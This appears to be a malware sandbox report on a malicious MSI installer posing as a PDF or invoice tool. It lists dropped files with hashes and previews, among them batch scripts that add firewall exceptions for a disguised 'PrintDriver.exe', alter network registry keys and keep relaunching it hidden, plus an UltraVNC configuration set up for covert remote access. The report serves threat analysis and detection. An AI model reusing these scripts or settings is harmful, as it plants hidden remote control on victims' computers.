                                                                  • Filename: Bill Details.exe, Detection: malicious, Browse
                                                                  • Filename: PersonalizedOffer.exe, Detection: malicious, Browse
                                                                  • Filename: PersonalizedOffer.exe, Detection: malicious, Browse
                                                                  • Filename: QV3alAAmyK.msi, Detection: malicious, Browse
                                                                  • Filename: 68uOx5fKVm.msi, Detection: malicious, Browse
                                                                  • Filename: LjDIDCNaEs.msi, Detection: malicious, Browse
                                                                  • Filename: Rechnung n. 53067.exe, Detection: malicious, Browse
                                                                  • Filename: document2304.msi, Detection: malicious, Browse
                                                                  Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$...........[..[..[......S.............Q..=.~.T......H......W......i......|..[..@......Z..[..]......F.............Z....|.Z..[...Z......Z..Rich[..........................PE..d....*4e.........."..........J.................@.............................@6.......,...`.....................................................,.....).(.....(.X....H,..'... 6.\....S..T....................U..(....S..8............................................text............................... ..`.rdata..0,..........................@..@.data............"..................@....pdata..X.....(.....................@..@_RDATA........).....................@..@.rsrc...(.....).....................@..@.reloc..\.... 6......6,.............@..B................................................................................................................................................

                                                                  C:\Games\PrintDriver.txt

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1218
                                                                  Entropy (8bit):5.347337974867111
                                                                  Encrypted:false
                                                                  SSDEEP:24:nep9ZV2tXY7ur3C7T0PaV1k774kIwoFEGMoFha9QGykaz/JW0y49:6oo7urw0ieGDQykazxW0z9
                                                                  MD5:6EB13F7936A83F4C44842029914AAD6E
                                                                  SHA1:7B9B27731D4CA6F996CE68C5D68B4D653E31D915
                                                                  SHA-256:8D9BB49947D9DC7FA7BE7310149A99F13A0C02580FD996AAE31C69D673775C49
                                                                  SHA-512:227788193867B2F99A62AE792D91562AD46EA3FA0855CF6EF28FC0DE31D43F2E671C6EF50E534F0235F1F663769715BEF162913A554E86E581FE05455373623E
                                                                  Malicious:false
                                                                  Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\PrintDrivers /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ....netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL....netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL....set EXEC_CMD="PrintDriver.exe"..wmic process where (name=%EXEC_CMD%) get command

                                                                  C:\Games\PrintDrivers.cmd

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):7
                                                                  Entropy (8bit):2.8073549220576046
                                                                  Encrypted:false
                                                                  SSDEEP:3:Fy:c
                                                                  MD5:D56206FDD032E403CCACD4695BFDFFBC
                                                                  SHA1:02990FAB8286E2ED2A48E6612D23E434FD80AEE8
                                                                  SHA-256:D5BE9600EE47C9DA11CCFAAFEBDB28DE9E774B473CC6C3034F7D3643ED3CD239
                                                                  SHA-512:8CD35692BC6810194073E80D9F6CB36BD2221A5CC6A6735984C2FE84EF75B2FBBBFAC0C0D3280B57A056E732DEBA3D6AF62D967EDE636392DB1D5B72380232EC
                                                                  Malicious:false
                                                                  Preview:EXIT ..

                                                                  C:\Games\PrintDrivers.exe

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):412832
                                                                  Entropy (8bit):6.584221629525791
                                                                  Encrypted:false
                                                                  SSDEEP:12288:zeLkVzUuD6yjqilGbz+ytVYeVhu1CeYv5dSCsHBl:z0klUuD6yjqwGb3YKndxsD
                                                                  MD5:29ED7D64CE8003C0139CCCB04D9AF7F0
                                                                  SHA1:8172071A639681934D3DC77189EB88A04C8BCFAC
                                                                  SHA-256:E48AAC5148B261371C714B9E00268809832E4F82D23748E44F5CFBBF20CA3D3F
                                                                  SHA-512:4BDD4BF57EAF0C9914E483E160182DB7F2581B0E2ADC133885BF0F364123D849D247D3F077A58D930E80502A7F27F1457F7E2502D466AEC80A4FBEEBD0B59415
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: Bill Details.exe, Detection: malicious, Browse
                                                                  • Filename: Bill Details.exe, Detection: malicious, Browse
                                                                  • Filename: PersonalizedOffer.exe, Detection: malicious, Browse
                                                                  • Filename: PersonalizedOffer.exe, Detection: malicious, Browse
                                                                  • Filename: QV3alAAmyK.msi, Detection: malicious, Browse
                                                                  • Filename: 68uOx5fKVm.msi, Detection: malicious, Browse
                                                                  • Filename: LjDIDCNaEs.msi, Detection: malicious, Browse
                                                                  • Filename: Rechnung n. 53067.exe, Detection: malicious, Browse
                                                                  • Filename: document2304.msi, Detection: malicious, Browse
                                                                  • Filename: Ref. Num. 886789432.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t.5E0.[.0.[.0.[.$.X.>.[.$.^...[..._.!.[...X.'.[...^.`.[.$._.'.[.$.].1.[.$.Z.#.[.0.Z...[...R.#.[....1.[.0...1.[...Y.1.[.Rich0.[.................PE..L...f..^.........."......z...........P............@..................................#....@.................................h........0...............2.......@..<;.....p...........................@...@............................................text....x.......z.................. ..`.rdata...S.......T...~..............@..@.data....6..........................@....rsrc........0......................@..@.reloc..<;...@...<..................@..B........................................................................................................................................................................................................................................................................................

                                                                  C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):59616
                                                                  Entropy (8bit):6.256689659839278
                                                                  Encrypted:false
                                                                  SSDEEP:768:J+ldD4YWUitnwaGi4uJqGWxD/Ax2OcAjaojLsXqUWyov+ytDq51VHETolvbd:J+/WU+ooWdAxe3oryo2y47
                                                                  MD5:E043EFF841573540FDE059E5894BCB32
                                                                  SHA1:5D9D36CFFB0BE37A21B86D390B591DE078DD7305
                                                                  SHA-256:32EAE05C28F78A4D7C6C6D64EF75C820FEBF6556AC97E361FBCE33EDDFCE0C52
                                                                  SHA-512:CD8DA3E6D6653F3E8720E0CA14FAF1A4384CBF3C1C114C6C6E5ACF31A12E9FD6568D22E3952B716FF5A7C37F6511BF88FD3C950F7D877B530269877B6FBA2036
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j..............Y{......Y{......Y{.......s8......`...............`.......z.......z.......z......Rich............PE..d....Y._.........." .....|...R.......E..............................................-.....`A........................................ ...\...|...................4...................X...8...............................0............... ............................text....z.......|.................. ..`.rdata...6.......8..................@..@.data...............................@....pdata..4...........................@..@_RDATA..............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                  C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.inf

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Windows setup INFormation
                                                                  Category:dropped
                                                                  Size (bytes):3894
                                                                  Entropy (8bit):3.708918006213435
                                                                  Encrypted:false
                                                                  SSDEEP:48:5oAqNab+l0sOIbxcfW2iIVOgUqGNnijzXLTRkYx:saAIVANniNx
                                                                  MD5:52010E2E305DC5E165FC3376194F46CB
                                                                  SHA1:7ACC7CC893F968255BA19FCEB3E9549489290198
                                                                  SHA-256:6FC15A8582C91CC038734D12667201E3A11476ADCB7A503E0A7F49CBC86664DA
                                                                  SHA-512:63F4DDAF6EC7F48749BC64F71AADD93814CDBDCDCEDAED8F0A4E3084731550100880C96EEA06C7EA08FE27F5B7D4E40911BFC6A322F5C278B6926FB7D26D83B1
                                                                  Malicious:false
                                                                  Preview:..;.....;. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...i.n.f.....;.........[.V.e.r.s.i.o.n.].....P.n.p.L.o.c.k.D.o.w.n.=.1.....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e.=.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .1.0./.1.8./.2.0.2.0.,.1.7...6...9...3.2.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.=.S.t.a.n.d.a.r.d.,.N.T.a.m.d.6.4.........[.S.t.a.n.d.a.r.d...N.T.a.m.d.6.4.].....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...d.l.l.=.

                                                                  C:\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8568
                                                                  Entropy (8bit):7.291311793552157
                                                                  Encrypted:false
                                                                  SSDEEP:192:Z7bJSInYe+PjPN3KowgCuodZubhSZyEl8YsuUAwqwPg4Qw:eInYPLNaowNZvZyEPLwqwaw
                                                                  MD5:2E8AE727E869AF0F7022EF7C749576BA
                                                                  SHA1:957282B254DE53850C6526E141B5D4B6A4FBE182
                                                                  SHA-256:1EE82E7912C37A482FBA1426A845DDD32A518871E586929125AFF7E180ABCEDB
                                                                  SHA-512:03349F044DD23FEFF9E029B646896B926C8C321F894263AD3FF7FE22447D9045ADA576C771DDD9F03CC54C8EBE14D1FDDC5FB9E7D9BADA99BA1063B232C681F9
                                                                  Malicious:false
                                                                  Preview:0.!t..*.H........!e0.!a...1.0...+......0.....+.....7......0...0...+.....7.....M....Z.@....1.}...201018150615Z0...+.....7.....0...0.... o.Z.....8sM.fr...v..zP>..I..fd.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... o.Z.....8sM.fr...v..zP>..I..fd.0....z.|..h%[....T..)..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0.... }.^V..[S.Ds...k.G.....1.dj...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... }.^V..[S.Ds...k.G.....1.dj...0.......r......."..z.-]1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0

                                                                  C:\Games\UltraVNC.ini

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Generic INItialization configuration [UltraVNC]
                                                                  Category:dropped
                                                                  Size (bytes):1237
                                                                  Entropy (8bit):5.248089588602443
                                                                  Encrypted:false
                                                                  SSDEEP:24:O4OWN4U2WDKaGETVYsICJhFXNTGUSlAXHBFXg9B7Pid9TMyd5hXQ28OjulnN:O4OWN42AoVNICJzwUUQBF2qdp9jt2OjS
                                                                  MD5:CB5B8A5789C15957C039FF3CE988C1A2
                                                                  SHA1:4DE9A626F04BC7C619FDB68E5585739855DED2D1
                                                                  SHA-256:A11A72865948A8D6A88DF530108C3B8BA3E8B4AC6316AC22443AF81FA1C3DAF4
                                                                  SHA-512:68DD583237EA70702D76D9A2A607BBB8F2E2A1E4285DE347B4E23FAA0063B51F20F5A84CBE907EF4C123EBA0ADD1C99CB4F9F1E13DDFF97B34BB1E7C18825E32
                                                                  Malicious:false
                                                                  Preview:[admin]..UseRegistry=0..MSLogonRequired=0..NewMSLogon=0..DebugMode=2..Avilog=0..path=C:\Users\Administrator\Documents\Advanced Installer(Giovani)\Projects\OpenIMS\VNC1\RDP\dual monitor..kickrdp=0..service_commandline=..DebugLevel=10..DisableTrayIcon=0..rdpmode=0..LoopbackOnly=0..UseDSMPlugin=0..AllowLoopback=1..AuthRequired=1..ConnectPriority=0..DSMPlugin=No Plugin Detected..AuthHosts=..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=1..BlankInputsOnly=0..DefaultScale=1..SocketConnect=1..HTTPConnect=1..AutoPortSelect=1..PortNumber=5900..HTTPPortNumber=5800..IdleTimeout=0..IdleInputTimeout=0..RemoveWallpaper=0..RemoveAero=0..QuerySetting=1..QueryTimeout=10..QueryAccept=0..QueryIfNoLogon=0..primary=1..secondary=1..InputsEnabled=1..LockSetting=0..LocalInputsDisabled=0..EnableJapInput=0..FileTransferTimeout=1..clearconsole=0..accept_reject_mesg=..KeepAliveInterval=5..[UltraVNC]..passwd=A7F8FC867315B7FF5F..passwd2=A7F

                                                                  C:\Games\ddengine.dll

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):336328
                                                                  Entropy (8bit):6.219688100806805
                                                                  Encrypted:false
                                                                  SSDEEP:6144:ECh9ewxF4jpDZAGMNcV3gR9AQn8/GCANEIV2PYS/:EX9lA1Nv78Iuhd/
                                                                  MD5:51092B47A18907D361D8FC282877F85C
                                                                  SHA1:E82A4396DFE37E1D4CBFF44EC517540608A88251
                                                                  SHA-256:77F2BDBAEDBAF76873433CBEE63DC643277B435FED72983CE1DD117575685F99
                                                                  SHA-512:52B6C9DCA020098C99757B159E8A0DD2E9D39A1C4915F1088DE53AB40E67B0D5AA46528B78B16FDFC449733979181655008829813CDD411B6F722548CF6515FB
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..G;..G;..G;..(_..K;..(_..O;..(_...;...S..O;...S.. ;...S..S;..(_..J;..G;...;...R..@;...R..F;...R:.F;...R..F;..RichG;..................PE..d....Zd.........." .....4...........y.......................................`.......D....`..........................................................@...........9.......'...P..x...@...p............................................P..P............................text....2.......4.................. ..`.rdata..nQ...P...R...8..............@..@.data...@>.......$..................@....pdata...9.......:..................@..@.SharedD.....0......................@....rsrc........@......................@..@.reloc..x....P......................@..B................................................................................................................................................................................................

                                                                  C:\Games\driverhelp.cmd

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):870
                                                                  Entropy (8bit):5.106711504896485
                                                                  Encrypted:false
                                                                  SSDEEP:12:/vp14u4pwqZV2/+AgJIhL0EYrvD6Pz3ol7T2HA6tPH6VZ3kxh0fysCkFGT8UWMpr:nep9ZV2tXY7ur3C7T0PaV1k774kI2p
                                                                  MD5:FD3B5847DDB8A31413951C0AA870AB95
                                                                  SHA1:E3E91E3E9FA442CD1937422120DE91DA87973DDB
                                                                  SHA-256:E4F5E16DFE9BBE6D63F266103C35C0035A2D4014F516420190B7CFAFB02B08AD
                                                                  SHA-512:5D8599F7D6F0824AB30118F5680BF89D28C1E7E9DE4ED61AF9074CB9D339619D59DAB8E5818DC93DCF5B27AD9E8A863C5D082F8F829AA8C4A026EC5DA2454096
                                                                  Malicious:false
                                                                  Preview:::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB"..rem start C:\Games\PrintDrivers /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..:com ..for %%A in (C:\Games\PrintDrivers.cmd) do if %%~zA gtr 7 start C:\Games\PrintDrivers.exe /HideWindow C:\Games\PrintDrivers.cmd..timeout /t 20..goto com

                                                                  C:\Games\powercfg.msi

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {3A995974-27F0-4693-BBBA-215A8CDC3544}, Number of Words: 2, Subject: Your Application, Author: Your Company, Name of Creating Application: Advanced Installer 17.3 build 2e9bb285, Template: ;1033, Comments: This installer database contains the logic and data required to install Your Application., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                  Category:dropped
                                                                  Size (bytes):976384
                                                                  Entropy (8bit):6.553744622059538
                                                                  Encrypted:false
                                                                  SSDEEP:24576:m7bYOINVUuD6yS1wGbXpsHzCsa1fLK/hVrA:m7bYO+UuD6ySaGbX+H9at+hVrA
                                                                  MD5:AA6C669C39D9BE8B6289F10DAAFBA6F3
                                                                  SHA1:A7A73BD177B58847F42DAE48DA443E33482DD337
                                                                  SHA-256:C5BF02C8C23DBF8798D87FAD91EA44A3153FC1026248BD931F360BA0D6C5989E
                                                                  SHA-512:1A7A272E63BEDA9B887158E8187C5D8A2351B21FDF912951555CF0DB9F693A4C92DEC4628C9FFE2E535D7FB869E03C12EB236DC8FD21E2118ED1BF193A010E93
                                                                  Malicious:false
                                                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<.............../...#........................................................................................... ...!..."...,...$...%...&...'...(...)...*...+...-.......3...0...@...1...2...5...4...=...6...7...8...9...:...;.......e...>...?...D...A...B...C.......E...^...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]......._...`...a...b...c...d...f...y...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...z.......

                                                                  C:\Games\vnchooks.dll

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):488392
                                                                  Entropy (8bit):6.487016089879727
                                                                  Encrypted:false
                                                                  SSDEEP:12288:2z3lKqNpYmBzR4vyj/DiSOzvL/fye6VOTC3aevaMo4YXbGggjlM4:2z3l96FgpM4
                                                                  MD5:C2666428A2947B6FFC1981DD7D0373A9
                                                                  SHA1:9FD441B50427B6265AFC6AF9C7B3C398A3DDA82D
                                                                  SHA-256:2C765BBACCA51331DBF3D04644BDA55AB9A3E5E3716A2B71FD018FD2ED1346BC
                                                                  SHA-512:09093E66A810EB05467BE7521795A4BE5714DD150E4EA0930AD0227C391161F873B5E0B12615964097D7E83D31506EE3D038424D08E74AD88C80A3798EEC45D7
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n..g*.{4*.{4*.{4..x5/.{4..~5..{4...5 .{4x.~5..{4x..5$.{4x.x5#.{4..z5#.{4*.z4S.{4..r5+.{4..{5+.{4...4+.{4*..4+.{4..y5+.{4Rich*.{4........PE..d......d.........." .................2.................................................... .....................................................d............0..@G...L...'..........@{..p............................{..8............................................text... ........................... ..`.rdata...!......."..................@..@.data....&..........................@....pdata..@G...0...H..................@..@_RDATA...............:..............@..@.rsrc................<..............@..@.reloc...............B..............@..B................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.150184159866505
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKRk3/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5M/iDnLNkPlE99SNxAhUe/3
                                                                  MD5:B42695CFADADE7807924183BFD2F1F38
                                                                  SHA1:1963FA81687705C862FA6E2461539EFE802815F3
                                                                  SHA-256:23FBE5DDA55DADA0A0D766B33B8DE5CE739BF87824DD8D13A627102B760F6E84
                                                                  SHA-512:C26FD2328AA776F348919DE24ED76B667C22499814452243BA6B6C880E576B43B37AF78174C12B5E58885541B1ED3792C7FAA979E964A138515303E379EC52CC
                                                                  Malicious:false
                                                                  Preview:p...... ...............(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                  C:\Users\user\AppData\Local\Temp\PrintFattura230724.png

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PNG image data, 5208 x 8664, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):3246796
                                                                  Entropy (8bit):7.708096217218525
                                                                  Encrypted:false
                                                                  SSDEEP:98304:3+DIr/w96Z/G/Wrv2R8IQUbhBninNjcOE8:NLw90hrvItehcQ
                                                                  MD5:CCE9725B6A855F4E77C30F9717E7747E
                                                                  SHA1:CC8270DB0C62B3F383B1D770A9861F5DFFA7A962
                                                                  SHA-256:2987BB8D3614291F8EF10E8CCABD9E95696E7EFDEF48CD557824B0C39F928B09
                                                                  SHA-512:066177CC2AC7A7A819F50EEB594886927A4870645B2B0F36B38FAC88EB1D53DC80F4B37CE7ECE55B859D420A5AD8EF0D8A090CACC6690419EA476D7EE854CE06
                                                                  Malicious:false
                                                                  Preview:.PNG........IHDR...X..!..............pHYs..,K..,K..=......sRGB.........gAMA......a..1.aIDATx..K...........V.>U6l...P.-...h.>.Q....$<.7..n.0.2.\..J.R..s3.^...\...'.\_&.. ....a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a..a.?.....o}.${K.e.h.V..mM.>.?.C.....0.-kk....>O.8..%....e.k.gcLc%.....wV..Xu,I[g.....zY.

                                                                  C:\Windows\Installer\603b50.msi

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {92C98B75-E1D1-429B-9815-3BF9C1AD8A52}, Number of Words: 10, Subject: Pdf, Author: Pdf, Name of Creating Application: Pdf (Evaluation Installer), Template: ;1033, Comments: This installer database contains the logic and data required to install Pdf. (Evaluation Installer), Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Wed Oct 9 11:42:36 2024, Last Saved Time/Date: Wed Oct 9 11:42:36 2024, Last Printed: Wed Oct 9 11:42:36 2024, Number of Pages: 450
                                                                  Category:dropped
                                                                  Size (bytes):7064064
                                                                  Entropy (8bit):7.792563695599767
                                                                  Encrypted:false
                                                                  SSDEEP:196608:QK4NkomkEmjut8DMcj4IWKPDNwmtoOCvHLNkAIdc:QKfkEmjuSMcxWKLNwunA5
                                                                  MD5:E21B2080C98BEB0F04307A5A25630E23
                                                                  SHA1:8FC24AD51E8D61324FE8DE1BE667862E9238CBBB
                                                                  SHA-256:0DBEAAB616C483B81D9E9ED8DDA14A3A8F3B024130F8FAB840E7B9F3A7B1787E
                                                                  SHA-512:3706FDE6569BCCB39E2C58E86C60050C73BCDBE5C7EB05849CED33C75B5A1C3B080746C2E27420C6FFFCD3497E1B1B6AB87E1B2D371A80FA3AE27851A64CFBEA
                                                                  Malicious:false
